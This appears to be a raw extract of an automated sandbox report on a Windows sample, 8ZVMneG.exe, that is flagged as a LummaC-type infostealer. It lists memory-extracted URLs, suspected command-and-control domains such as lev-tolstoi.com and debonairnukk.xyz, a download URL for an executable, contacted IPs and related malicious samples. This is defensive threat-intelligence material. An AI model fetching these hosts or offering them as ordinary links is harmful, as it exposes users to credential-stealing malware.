                                                                                                                    https://lev-tolstoi.com/e8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=18ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://community.fastly.steamstatic.com/8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://steam.tv/8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://debonairnukk.xyz/api2H8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://lev-tolstoi.com/8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2354896716.0000000003C1C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2399977215.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2354654616.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2427078648.0000000003C1C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2402833146.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440560885.0000000003C1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://store.steampowered.com/privacy_agreement/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://wrathful-jammy.cyou/8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://store.steampowered.com/points/shop/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl08ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://ocsp.rootca1.amazontrust.com0:8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://lev-tolstoi.com/;.8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://sketchfab.com8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.ecosia.org/newtab/8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://lv.queniujq.cn8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br8ZVMneG.exe, 00000003.00000003.2377179600.0000000003D36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.youtube.com/8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://store.steampowered.com/privacy_agreement/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.google.com/recaptcha/8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://checkout.steampowered.com/8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=lILQ2m8IgfoI&l=e8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://store.steampowered.com/;8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://store.steampowered.com/about/8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://steamcommunity.com/my/wishlist/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://lev-tolstoi.co8ZVMneG.exe, 00000003.00000003.2483406156.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://lev-tolstoi.com/Dr8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://help.steampowered.com/en/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://steamcommunity.com/market/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://store.steampowered.com/news/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://store.steampowered.com/subscriber_agreement/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://recaptcha.net/recaptcha/;8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://steamcommunity.com/discussions/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://debonairnukk.xyz/api8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://store.steampowered.com/stats/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=Q6Qn8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://medal.tv8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://broadcast.st.dl.eccdnx.com8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://store.steampowered.com/steam_refunds/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://x1.c.lencr.org/08ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            http://x1.i.lencr.org/08ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319008ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620168ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        https://lev-tolstoi.com/(x88ZVMneG.exe, 00000003.00000003.2402881702.000000000141A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2403246485.000000000141C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                          https://steamcommunity.com/workshop/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high

                                                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                            104.21.66.86
                                                                                                                                                                                                                                            		lev-tolstoi.comUnited States
                                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            23.55.153.106
                                                                                                                                                                                                                                            		steamcommunity.comUnited States
                                                                                                                                                                                                                                            		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                            178.62.201.34
                                                                                                                                                                                                                                            		immureprech.bizEuropean Union
                                                                                                                                                                                                                                            		14061DIGITALOCEAN-ASNUSfalse

                                                                                                                                                                                                                                            General Information

                                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                            Analysis ID:1578702
                                                                                                                                                                                                                                            Start date and time:2024-12-20 07:03:06 +01:00
                                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                            Overall analysis duration:0h 5m 53s
                                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                            Number of analysed new started processes analysed:6
                                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                                            Sample name:8ZVMneG.exe
                                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@4/0@13/3
                                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                                            • Successful, ratio: 50%
                                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                                            • Number of executed functions: 20
                                                                                                                                                                                                                                            • Number of non-executed functions: 54
                                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                            • Execution Graph export aborted for target 8ZVMneG.exe, PID 2144 because there are no executed function
                                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                                            01:04:00API Interceptor14x Sleep call for process: 8ZVMneG.exe modified

                                                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                                                            IPs

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                                            23.55.153.106file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                              ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                        v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                          cccc2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                178.62.201.34java.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                                                                                                • uyhgqunqkxnx.pw/EiDQjNbWEQ/

                                                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                lev-tolstoi.comji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                • 172.67.157.254
                                                                                                                                                                                                                                                                5_6253708004881862888.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                1fxm3u0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 104.21.66.86
                                                                                                                                                                                                                                                                immureprech.bizfile.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                                • 104.131.68.180
                                                                                                                                                                                                                                                                ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 178.62.201.34
                                                                                                                                                                                                                                                                ardware-v1.exeGet hashmaliciousLummaCBrowse
